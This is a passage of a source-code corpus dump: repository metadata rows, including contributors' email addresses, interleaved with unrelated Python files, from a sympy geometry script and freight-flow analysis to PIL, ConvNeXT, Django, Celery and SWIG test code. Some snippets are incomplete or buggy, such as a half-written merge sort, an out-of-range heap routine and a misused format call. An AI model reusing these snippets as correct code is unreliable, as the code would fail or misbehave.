"j.gresl12@gmail.com"
] |
j.gresl12@gmail.com
|
ee66a6bd15526f6ff00f62a9ee1641bd9236a49f
|
66e06eec0d72dd0f1fbbf2985bbbda858591bffc
|
/2016/007-Mathsjam/CircleInTriangle.py
|
5c15fba7fb64885b75eff5dac15c497aec504ad1
|
[] |
no_license
|
kobylin/Lab
|
b35cd5eba8087946d475202e4d36ef7329bb74a5
|
35a33d84e0de6c891c34aa2806052b5f695f527d
|
refs/heads/master
| 2021-08-30T07:12:52.955872
| 2017-12-16T16:14:27
| 2017-12-16T16:14:27
| 114,474,224
| 0
| 0
| null | 2017-12-16T16:21:33
| 2017-12-16T16:21:33
| null |
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
from sympy import Point,Line,Circle,intersection,Triangle,N
from svg import Svg
C = Point(0,8)
D = Point(0,2)
xaxis = Line(Point(0,0),Point(1,0))
CircleD = Circle(D,2)
tangentE = CircleD.tangent_lines(C)[0]
E = intersection(tangentE,CircleD)[0]
A = intersection(tangentE, xaxis)[0]
CircleD = Circle(D,2)
svg = Svg()
svg.append(C,"C")
#svg.append(D)
svg.append(CircleD,"CircleD")
svg.append(tangentE,"tangE")
svg.append(E,"E")
svg.append(A,"A")
def find_circle(circle,A,C,D,i):
AD = Line(A,D)
svg.append(AD,"AD",i)
K = intersection(circle, AD)[0]
svg.append(K,"K",i)
tangentK = Line(A,D).perpendicular_line(K)
svg.append(tangentK,"tangK",i)
P1 = intersection(tangentK, Line(A,C))[0]
svg.append(P1,"P1",i)
P2 = intersection(tangentK, xaxis)[0]
svg.append(P2,"P2",i)
T = Triangle(P1,A,P2)
svg.append(T,"T",i)
return T.incircle
circle = CircleD
for i in range(1):
circle = find_circle(circle,A,C,D,i)
svg.append(circle,"circle",i)
svg.close()
|
[
"janchrister.nilsson@gmail.com"
] |
janchrister.nilsson@gmail.com
|
2823a48cbeebcac8a5b49aeb6306ea0ebabe21e0
|
01f535557c2275a0c0cd91687d52c644e8176d00
|
/src/vtra/analysis/flow_assignment/industry_flows.py
|
f08d77411f7d216c3c28a8190c7613a014fea9c4
|
[] |
no_license
|
mmc00/oia-transport-archive
|
a8eaf72751a2c11b2cc2dc475e6eed2421d75381
|
f89cb686704fe76c1665697b35d14caccf37f3a1
|
refs/heads/master
| 2022-03-28T17:44:41.915217
| 2020-01-09T16:22:10
| 2020-01-09T16:22:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,444
|
py
|
"""Summarise hazard data
Get OD data and process it
Author: Raghav Pant
Date: April 20, 2018
"""
import configparser
import csv
import glob
import os
import fiona
import fiona.crs
import rasterio
from sqlalchemy import create_engine
import subprocess as sp
import psycopg2
import osgeo.ogr as ogr
import pandas as pd
import copy
import ast
from osgeo import gdal
import geopandas as gpd
from shapely.geometry import Point
from geoalchemy2 import Geometry, WKTElement
import numpy as np
from vtra.utils import load_config
from vtra.dbutils import *
import vtra.transport_network_creation as tnc
def main():
'''
Create the database connection
'''
conf = load_config()
try:
conn = psycopg2.connect(**conf['database'])
except:
print ("I am unable to connect to the database")
curs = conn.cursor()
engine = create_engine('postgresql://{user}:{password}@{host}:{port}/{database}'.format({
**conf['database']
}))
od_data_file = os.path.join(conf['paths']['data'], 'od_data', 'OD_transport_data_2008_v2.xlsx')
'''
Step 2: Create the OD proprotions for the differnet modes
'''
'''
First get the modal shares
'''
modes = ['road','rail','air','water']
mode_cols = ['road','rail','air','inland','coastal']
new_mode_cols = ['o','d','road','rail','air','water']
mode_table = ['airport_nodes','waternodes','railnetworknodes','road2009nodes']
mode_edge_tables = ['airport_edges','wateredges','railnetworkedges','road2009edges']
mode_flow_tables = []
for mo in mode_edge_tables:
fl_table = mo + '_flows'
mode_flow_tables.append(fl_table)
'''
Get the modal shares
'''
od_data_modes = pd.read_excel(od_data_file,sheet_name = 'mode').fillna(0)
# od_data_modes.columns = map(str.lower, od_data_modes.columns)
o_id_col = 'o'
d_id_col = 'd'
od_data_modes['total'] = od_data_modes[mode_cols].sum(axis=1)
for m in mode_cols:
od_data_modes[m] = od_data_modes[m]/od_data_modes['total'].replace(np.inf, 0)
od_data_modes['water'] = od_data_modes['inland'] + od_data_modes['coastal']
od_data_modes = od_data_modes.fillna(0)
# od_data_modes.to_csv('mode_frac.csv',index = False)
od_fracs = od_data_modes[new_mode_cols]
od_data_com = pd.read_excel(od_data_file,sheet_name = 'goods').fillna(0)
ind_cols = ['sugar','wood','steel','constructi','cement','fertilizer','coal','petroluem','manufactur','fishery','meat']
od_fracs = pd.merge(od_fracs,od_data_com,how='left', on=['o','d'])
del od_data_com,od_data_modes
od_fracs = od_fracs.fillna(0)
# od_fracs.to_csv('od_fracs.csv')
for ind in ind_cols:
'''
Step 2 assign the crop to the closest transport mode node
'''
# mode_table = ['road2009nodes','railwaynetworknodes','airport_nodes','waternodes']
# mode_edge_tables = ['road2009edges','railwaynetworkedges','airport_edges','wateredges']
# modes = ['road','rail','air','water']
modes = ['air','water','rail','road']
mode_id = 'node_id'
od_id = 'od_id'
pop_id = 'population'
o_id_col = 'o'
d_id_col = 'd'
'''
Get the network
'''
eid = 'edge_id'
nfid = 'node_f_id'
ntid = 'node_t_id'
spid = 'speed'
gmid = 'geom'
o_id_col = 'o'
d_id_col = 'd'
'''
Get the node edge flows
'''
excel_writer = pd.ExcelWriter('vietnam_flow_stats_' + ind + '.xlsx')
for m in range(len(mode_table)):
od_nodes_regions = []
sql_query = '''select {0}, {1}, 100*{2}/(sum({3}) over (Partition by {4})) from {5}
'''.format(mode_id,od_id,pop_id,pop_id,od_id,mode_table[m])
curs.execute(sql_query)
read_layer = curs.fetchall()
if read_layer:
for row in read_layer:
n = row[0]
r = row[1]
p = float(row[2])
if p > 0:
od_nodes_regions.append((n,r,p))
all_net_dict = {'edge':[],'from_node':[],'to_node':[],'distance':[],'speed':[],'travel_cost':[]}
all_net_dict = tnc.create_network_dictionary(all_net_dict,mode_edge_tables[m],eid,nfid,ntid,spid,'geom',curs,conn)
od_net = tnc.create_igraph_topology(all_net_dict)
'''
Get the OD flows
'''
net_dict = {'Origin_id':[],'Destination_id':[],'Origin_region':[],'Destination_region':[],'Tonnage':[],'edge_path':[],'node_path':[]}
ofile = 'network_od_flows_' + ind + modes[m] + '.csv'
output_file = open(ofile,'w')
wr = csv.writer(output_file, delimiter=',', quoting=csv.QUOTE_MINIMAL)
wr.writerow(net_dict.keys())
ind_mode = modes[m]+ '_' + ind
od_fracs[ind_mode] = od_fracs[modes[m]]*od_fracs[ind]
od_flows = list(zip(od_fracs[o_id_col].values.tolist(),od_fracs[d_id_col].values.tolist(),od_fracs[ind_mode].values.tolist()))
origins = list(set(od_fracs[o_id_col].values.tolist()))
destinations = list(set(od_fracs[d_id_col].values.tolist()))
dflows = []
# print (od_flows)
for o in origins:
for d in destinations:
fval = [fl for (org,des,fl) in od_flows if org == o and des == d]
if len(fval) == 1 and fval[0] > 0:
o_matches = [(item[0],item[2]) for item in od_nodes_regions if item[1] == o]
if len(o_matches) > 0:
for o_vals in o_matches:
o_val = 1.0*fval[0]*(1.0*o_vals[1]/100)
o_node = o_vals[0]
d_matches = [(item[0],item[2]) for item in od_nodes_regions if item[1] == d]
if len(d_matches) > 0:
for d_vals in d_matches:
od_val = 1.0*o_val*(1.0*d_vals[1]/100)
d_node = d_vals[0]
if od_val > 0 and o_node != d_node:
# od_net = tnc.add_igraph_costs(od_net,t_val,0)
orgn_node = od_net.vs['node'].index(o_node)
dest_node = od_net.vs['node'].index(d_node)
# n_pth = od_net.get_shortest_paths(orgn_node,to = dest_node, weights = 'travel_cost', mode = 'OUT', output='vpath')[0]
e_pth = od_net.get_shortest_paths(orgn_node,to = dest_node, weights = 'travel_cost', mode = 'OUT', output='epath')[0]
# n_list = [od_net.vs[n]['node'] for n in n_pth]
e_list = [od_net.es[n]['edge'] for n in e_pth]
# cst = sum([od_net.es[n]['cost'] for n in e_pth])
net_dict = {'Origin_id':o_node,'Destination_id':d_node,'Origin_region':o,'Destination_region':d,
'Tonnage':od_val,'edge_path':e_list,'node_path':[o_node,d_node]}
wr.writerow(net_dict.values())
dflows.append((str([o_node,d_node]),str(e_list),od_val))
print (o,d,fval,modes[m],ind)
node_table = modes[m] + '_node_flows'
edge_table = modes[m] + '_edge_flows'
# dom_flows = pd.read_csv(ofile).fillna(0)
dom_flows = pd.DataFrame(dflows,columns = ['node_path', 'edge_path','Tonnage'])
flow_node_edge = dom_flows.groupby(['node_path', 'edge_path'])['Tonnage'].sum().reset_index()
n_dict = {}
e_dict = {}
n_dict,e_dict = get_node_edge_flows(flow_node_edge,n_dict,e_dict)
node_list = get_id_flows(n_dict)
df = pd.DataFrame(node_list, columns = ['node_id',ind])
df.to_excel(excel_writer,node_table,index = False)
excel_writer.save()
edge_list = get_id_flows(e_dict)
df = pd.DataFrame(edge_list, columns = ['edge_id',ind])
df.to_excel(excel_writer,edge_table,index = False)
excel_writer.save()
if df.empty:
add_zeros_columns_to_table_psycopg2(mode_flow_tables[m], [ind],['double precision'],conn)
else:
df.to_sql('dummy_flows', engine, if_exists = 'replace', schema = 'public', index = False)
add_columns_to_table_psycopg2(mode_flow_tables[m], 'dummy_flows', [ind],['double precision'], 'edge_id',conn)
curs.close()
conn.close()
if __name__ == '__main__':
main()
|
[
"tomalrussell@gmail.com"
] |
tomalrussell@gmail.com
|
4ca5452f0df11cd0388491948693a1c50cf6a03e
|
6be1990abf99c85ef886b49dcea1824aabb648d3
|
/weixinofneolocal/weixinofneolocal/libs/PIL/GbrImagePlugin.py
|
ff0f60f5d130760331d401418d04076713c432fc
|
[] |
no_license
|
neoguojing/cloudServer
|
b53ae205efe52cf0aea28dbb9e6c16c20caf991f
|
7c19101789b0c46474269e4c8fe00e92203e9cd7
|
refs/heads/master
| 2020-12-04T23:02:23.551479
| 2017-09-22T03:08:35
| 2017-09-22T03:08:35
| 67,382,984
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,635
|
py
|
#
# The Python Imaging Library
# $Id$
#
# load a GIMP brush file
#
# History:
# 96-03-14 fl Created
#
# Copyright (c) Secret Labs AB 1997.
# Copyright (c) Fredrik Lundh 1996.
#
# See the README file for information on usage and redistribution.
#
import Image, ImageFile
def i32(c):
return ord(c[3]) + (ord(c[2]) << 8) + (ord(c[1]) << 16) + (ord(c[0]) << 24L)
def _accept(prefix):
return i32(prefix) >= 20 and i32(prefix[4:8]) == 1
# #
# Image plugin for the GIMP brush format.
class GbrImageFile(ImageFile.ImageFile):
format = "GBR"
format_description = "GIMP brush file"
def _open(self):
header_size = i32(self.fp.read(4))
version = i32(self.fp.read(4))
if header_size < 20 or version != 1:
raise SyntaxError, "not a GIMP brush"
width = i32(self.fp.read(4))
height = i32(self.fp.read(4))
bytes = i32(self.fp.read(4))
if width <= 0 or height <= 0 or bytes != 1:
raise SyntaxError, "not a GIMP brush"
comment = self.fp.read(header_size - 20)[:-1]
self.mode = "L"
self.size = width, height
self.info["comment"] = comment
# Since the brush is so small, we read the data immediately
self.data = self.fp.read(width * height)
def load(self):
if not self.data:
return
# create an image out of the brush data block
self.im = Image.core.new(self.mode, self.size)
self.im.fromstring(self.data)
self.data = ""
#
# registry
Image.register_open("GBR", GbrImageFile, _accept)
Image.register_extension("GBR", ".gbr")
|
[
"guojing_neo@163.com"
] |
guojing_neo@163.com
|
c2afa2f4ed3d27b5eb256f45fbb043bb45179a34
|
e167dfb535b72f56ea3c30c498f2a74324e9e04c
|
/app/common/model_utils.py
|
7b0f98496899cb726bdd5a7ea11ccb8adc155300
|
[
"MIT"
] |
permissive
|
wlmsoft/Alpha-Gobang-Zero
|
ebde341af3ac6ecd9b6a71fdb0decedce078d2e8
|
f836aee7147aa2aeb47dd8b370f94950b833718d
|
refs/heads/master
| 2023-07-23T20:40:51.448213
| 2021-09-02T14:42:25
| 2021-09-02T14:42:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 327
|
py
|
# coding:utf-8
import torch
from alphazero import PolicyValueNet
def testModel(model: str):
""" 测试模型是否可用
Parameters
----------
model: str
模型路径
"""
try:
model = torch.load(model)
return isinstance(model, PolicyValueNet)
except:
return False
|
[
"1319158137@qq.com"
] |
1319158137@qq.com
|
bd15811b1f2fa433f9fbce560c2bb146a9882c43
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/built-in/nlp/Bert-text-classification_for_PyTorch/transformers/src/transformers/models/convnext/feature_extraction_convnext.py
|
860bda96b6d2ca7b488d2f710a55318ee5e5e41c
|
[
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 7,348
|
py
|
# coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for ConvNeXT."""
from typing import Optional, Union
import numpy as np
from PIL import Image
from ...feature_extraction_utils import BatchFeature, FeatureExtractionMixin
from ...file_utils import TensorType
from ...image_utils import (
IMAGENET_DEFAULT_MEAN,
IMAGENET_DEFAULT_STD,
ImageFeatureExtractionMixin,
ImageInput,
is_torch_tensor,
)
from ...utils import logging
logger = logging.get_logger(__name__)
class ConvNextFeatureExtractor(FeatureExtractionMixin, ImageFeatureExtractionMixin):
r"""
Constructs a ConvNeXT feature extractor.
This feature extractor inherits from [`FeatureExtractionMixin`] which contains most of the main methods. Users
should refer to this superclass for more information regarding those methods.
Args:
do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize (and optionally center crop) the input to a certain `size`.
size (`int`, *optional*, defaults to 224):
Resize the input to the given size. If 384 or larger, the image is resized to (`size`, `size`). Else, the
smaller edge of the image will be matched to int(`size`/ `crop_pct`), after which the image is cropped to
`size`. Only has an effect if `do_resize` is set to `True`.
resample (`int`, *optional*, defaults to `PIL.Image.BICUBIC`):
An optional resampling filter. This can be one of `PIL.Image.NEAREST`, `PIL.Image.BOX`,
`PIL.Image.BILINEAR`, `PIL.Image.HAMMING`, `PIL.Image.BICUBIC` or `PIL.Image.LANCZOS`. Only has an effect
if `do_resize` is set to `True`.
crop_pct (`float`, *optional*):
The percentage of the image to crop. If `None`, then a cropping percentage of 224 / 256 is used. Only has
an effect if `do_resize` is set to `True` and `size` < 384.
do_normalize (`bool`, *optional*, defaults to `True`):
Whether or not to normalize the input with mean and standard deviation.
image_mean (`List[int]`, defaults to `[0.485, 0.456, 0.406]`):
The sequence of means for each channel, to be used when normalizing images.
image_std (`List[int]`, defaults to `[0.229, 0.224, 0.225]`):
The sequence of standard deviations for each channel, to be used when normalizing images.
"""
model_input_names = ["pixel_values"]
def __init__(
self,
do_resize=True,
size=224,
resample=Image.BICUBIC,
crop_pct=None,
do_normalize=True,
image_mean=None,
image_std=None,
**kwargs
):
super().__init__(**kwargs)
self.do_resize = do_resize
self.size = size
self.resample = resample
self.crop_pct = crop_pct
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else IMAGENET_DEFAULT_MEAN
self.image_std = image_std if image_std is not None else IMAGENET_DEFAULT_STD
def __call__(
self, images: ImageInput, return_tensors: Optional[Union[str, TensorType]] = None, **kwargs
) -> BatchFeature:
"""
Main method to prepare for the model one or several image(s).
<Tip warning={true}>
NumPy arrays and PyTorch tensors are converted to PIL images when resizing, so the most efficient is to pass
PIL images.
</Tip>
Args:
images (`PIL.Image.Image`, `np.ndarray`, `torch.Tensor`, `List[PIL.Image.Image]`, `List[np.ndarray]`, `List[torch.Tensor]`):
The image or batch of images to be prepared. Each image can be a PIL image, NumPy array or PyTorch
tensor. In case of a NumPy array/PyTorch tensor, each image should be of shape (C, H, W), where C is a
number of channels, H and W are image height and width.
return_tensors (`str` or [`~file_utils.TensorType`], *optional*, defaults to `'np'`):
If set, will return tensors of a particular framework. Acceptable values are:
- `'tf'`: Return TensorFlow `tf.constant` objects.
- `'pt'`: Return PyTorch `torch.Tensor` objects.
- `'np'`: Return NumPy `np.ndarray` objects.
- `'jax'`: Return JAX `jnp.ndarray` objects.
Returns:
[`BatchFeature`]: A [`BatchFeature`] with the following fields:
- **pixel_values** -- Pixel values to be fed to a model, of shape (batch_size, num_channels, height,
width).
"""
# Input type checking for clearer error
valid_images = False
# Check that images has a valid type
if isinstance(images, (Image.Image, np.ndarray)) or is_torch_tensor(images):
valid_images = True
elif isinstance(images, (list, tuple)):
if len(images) == 0 or isinstance(images[0], (Image.Image, np.ndarray)) or is_torch_tensor(images[0]):
valid_images = True
if not valid_images:
raise ValueError(
"Images must of type `PIL.Image.Image`, `np.ndarray` or `torch.Tensor` (single example), "
"`List[PIL.Image.Image]`, `List[np.ndarray]` or `List[torch.Tensor]` (batch of examples)."
)
is_batched = bool(
isinstance(images, (list, tuple))
and (isinstance(images[0], (Image.Image, np.ndarray)) or is_torch_tensor(images[0]))
)
if not is_batched:
images = [images]
# transformations (resizing and optional center cropping + normalization)
if self.do_resize and self.size is not None:
if self.size >= 384:
# warping (no cropping) when evaluated at 384 or larger
images = [self.resize(image=image, size=self.size, resample=self.resample) for image in images]
else:
if self.crop_pct is None:
self.crop_pct = 224 / 256
size = int(self.size / self.crop_pct)
# to maintain same ratio w.r.t. 224 images
images = [
self.resize(image=image, size=size, default_to_square=False, resample=self.resample)
for image in images
]
images = [self.center_crop(image=image, size=self.size) for image in images]
if self.do_normalize:
images = [self.normalize(image=image, mean=self.image_mean, std=self.image_std) for image in images]
# return as BatchFeature
data = {"pixel_values": images}
encoded_inputs = BatchFeature(data=data, tensor_type=return_tensors)
return encoded_inputs
|
[
"dongwenbo6@huawei.com"
] |
dongwenbo6@huawei.com
|
34fbcbb5b07243310281ddcea4e59205032d636b
|
153da69b35f032f5b83a06f17008ba41a1b336b4
|
/src/demo/__init__.py
|
da984a42f90721752b48b31d39530ff3bf6f8ff9
|
[
"MIT"
] |
permissive
|
TrendingTechnology/hspylib
|
6400cadf9dfe6ab5733712dcfeccf8022d61c589
|
c79a2c17e89fe21d00ccd9c1646a03407cd61839
|
refs/heads/master
| 2023-06-20T15:47:35.962661
| 2021-07-19T22:12:18
| 2021-07-19T23:45:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
# _*_ coding: utf-8 _*_
#
# HSPyLib v0.11.1
#
# Package: demo
"""Package initialization."""
__all__ = [
'calculator',
'cli',
'phonebook'
]
|
[
"yorevs@gmail.com"
] |
yorevs@gmail.com
|
30b2b633485473169ebe3f7392c7b57e23c0e4d2
|
da7a165522daea7c346693c5f32850017c482967
|
/leetcode/60questions/347_top_k_frequent_elements.py
|
b13499eff1c603b9085c6ed2ac07a357fad804ac
|
[] |
no_license
|
SShayashi/ABC
|
19f8750919208c5ff8935638dbaab941c255f914
|
3cbfee0c5251c1bb0df6306166d8d4b33bf7bb2c
|
refs/heads/master
| 2021-05-04T21:06:10.720367
| 2020-07-11T13:59:16
| 2020-07-11T13:59:29
| 119,886,572
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 939
|
py
|
from typing import List
class Solution:
def topKFrequent(self, nums: List[int], k: int) -> List[int]:
d = {}
for num in nums:
d[num] = d[num] + 1 if d.get(num, 0) else 1
tmp = list(d.items())
tmp.sort(key=lambda x: x[1], reverse=True)
ans = []
for i in range(k):
ans.append(tmp[i][0])
return ans
def maxheaplify(nums: List[int], i):
left = nums[i * 2 + 1]
right = nums[i * 2 + 2] if (i * 2 + 2) < len(nums) else -9999999
large_child_i = i * 2 + 1 if left > right else i * 2 + 2
if nums[i] < nums[large_child_i]:
nums[i], nums[large_child_i] = nums[large_child_i], nums[i]
maxheaplify(nums, i // 2)
def heaplify(nums: List[int]):
length = len(nums)
for i in reversed(range(length // 2)):
maxheaplify(nums, i)
return nums
y = [3, 5, 6, 8, 2, 3, 4, 5, 21, 1, 4, 5, 7, 9, 2, 22]
print(heaplify(y))
|
[
"sshayashi0208@gmail.com"
] |
sshayashi0208@gmail.com
|
ff99da7f9a431c6ffe09cca96a217b4f38518c7a
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/merge_20200722101228.py
|
fc5063ed0117fd9fbf7a41674a7bab7060ccc3e0
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 477
|
py
|
items = []
def mergeSort(data):
if len(data) > 1:
mid = len(data) // 2
leftArr = data[:mid]
rightArr= data[mid:]
# now to perform the merge
i = 0
j = 0
k = 0
while i < len(leftArr) and j < len(rightArr):
if leftArr[i] < rightArr[j]:
data[k] =leftArr[i]
i +=1
else:
data[k] = rightArr[j]
j +=1
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
bde3cdffacb74c379934c3b976da5ac53db144a3
|
51e93332b5b0221bb1b34d4b53f761d9d53e1b9c
|
/app/core/migrations/0001_initial.py
|
a88ea9f86995282d556a7ffaa56cd09c1bfd0e23
|
[
"MIT"
] |
permissive
|
MaistrenkoAnton/TDD
|
286d0cb0d24c796f045eeac4d03f29ac3bf0ab5a
|
20049d08f22aeeb626a7975bbee3dc5c95c76449
|
refs/heads/master
| 2020-06-02T03:32:20.396472
| 2019-08-05T12:24:57
| 2019-08-05T12:24:57
| 191,021,446
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,707
|
py
|
# Generated by Django 2.1.9 on 2019-06-09 19:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
|
[
"it2015maistrenko@gmail.com"
] |
it2015maistrenko@gmail.com
|
710826787f7469b5c8d8e68f530a894b8067623e
|
f24f8a5cf1580470cf616705a220027feac9b177
|
/awesome/api/awesome/celery.py
|
ecb47c15ebd34979cbb44196e89352deda7f603a
|
[] |
no_license
|
tvtrong/restapi
|
4f5eb4ad545ed9dd7847f63994957fdc76fc3eba
|
c3da498108df1e7950ea2cc003dd75f0fe5a1b60
|
refs/heads/master
| 2022-12-25T19:39:45.627411
| 2020-10-10T12:39:33
| 2020-10-10T12:39:33
| 302,898,797
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
import os
from celery import Celery
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "awesome.settings")
celery_app = Celery("awesome")
celery_app.config_from_object("django.conf:settings", namespace="CELERY")
celery_app.autodiscover_tasks()
|
[
"phongtaitieu@gmail.com"
] |
phongtaitieu@gmail.com
|
746774617ed9e37b03bbc24665b63b4a592bf514
|
baf3996414315ffb60470c40c7ad797bf4e6897f
|
/02_ai/1_ml/4_ml_mastery/code/chapter_09/shuffle_split.py
|
300dc2268fc15665661c5450849e0a375e9836d3
|
[
"MIT"
] |
permissive
|
thiago-allue/portfolio
|
8fbbecca7ce232567aebe97c19944f444508b7f4
|
0acd8253dc7c5150fef9b2d46eead3db83ca42de
|
refs/heads/main
| 2023-03-15T22:10:21.109707
| 2022-09-14T17:04:35
| 2022-09-14T17:04:35
| 207,919,073
| 0
| 0
| null | 2019-11-13T18:18:23
| 2019-09-11T22:40:46
|
Python
|
UTF-8
|
Python
| false
| false
| 733
|
py
|
# Evaluate using Shuffle Split Cross Validation
from pandas import read_csv
from sklearn.model_selection import ShuffleSplit
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import LogisticRegression
filename = 'pima-indians-diabetes.data.csv'
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = read_csv(filename, names=names)
array = dataframe.values
X = array[:,0:8]
Y = array[:,8]
n_splits = 10
test_size = 0.33
seed = 7
kfold = ShuffleSplit(n_splits=n_splits, test_size=test_size, random_state=seed)
model = LogisticRegression()
results = cross_val_score(model, X, Y, cv=kfold)
print("Accuracy: %.3f%% (%.3f%%)" % (results.mean()*100.0, results.std()*100.0))
|
[
"thiago.allue@yahoo.com"
] |
thiago.allue@yahoo.com
|
c62c24e115cdf1835d84b2b7bb4b7def2fbadcf6
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-dms/samples/generated_samples/datamigration_v1_generated_data_migration_service_stop_migration_job_async.py
|
a4bc8f0f5878cfe73e659344426766b46ce49d17
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,959
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for StopMigrationJob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dms
# [START datamigration_v1_generated_DataMigrationService_StopMigrationJob_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import clouddms_v1
async def sample_stop_migration_job():
# Create a client
client = clouddms_v1.DataMigrationServiceAsyncClient()
# Initialize request argument(s)
request = clouddms_v1.StopMigrationJobRequest(
)
# Make the request
operation = client.stop_migration_job(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
# [END datamigration_v1_generated_DataMigrationService_StopMigrationJob_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
32899d3e754390786ab649a1de26f959c3d28b8e
|
ebd6f68d47e192da7f81c528312358cfe8052c8d
|
/swig/Examples/test-suite/python/overload_template_runme.py
|
014ec71cbb0db5035821e801e8ec2cb7a7342c9d
|
[
"LicenseRef-scancode-swig",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference",
"GPL-3.0-only",
"Apache-2.0"
] |
permissive
|
inishchith/DeepSpeech
|
965ad34d69eb4d150ddf996d30d02a1b29c97d25
|
dcb7c716bc794d7690d96ed40179ed1996968a41
|
refs/heads/master
| 2021-01-16T16:16:05.282278
| 2020-05-19T08:00:33
| 2020-05-19T08:00:33
| 243,180,319
| 1
| 0
|
Apache-2.0
| 2020-02-26T05:54:51
| 2020-02-26T05:54:50
| null |
UTF-8
|
Python
| false
| false
| 3,596
|
py
|
from overload_template import *
f = foo()
a = maximum(3, 4)
b = maximum(3.4, 5.2)
# mix 1
if (mix1("hi") != 101):
raise RuntimeError, ("mix1(const char*)")
if (mix1(1.0, 1.0) != 102):
raise RuntimeError, ("mix1(double, const double &)")
if (mix1(1.0) != 103):
raise RuntimeError, ("mix1(double)")
# mix 2
if (mix2("hi") != 101):
raise RuntimeError, ("mix2(const char*)")
if (mix2(1.0, 1.0) != 102):
raise RuntimeError, ("mix2(double, const double &)")
if (mix2(1.0) != 103):
raise RuntimeError, ("mix2(double)")
# mix 3
if (mix3("hi") != 101):
raise RuntimeError, ("mix3(const char*)")
if (mix3(1.0, 1.0) != 102):
raise RuntimeError, ("mix3(double, const double &)")
if (mix3(1.0) != 103):
raise RuntimeError, ("mix3(double)")
# Combination 1
if (overtparams1(100) != 10):
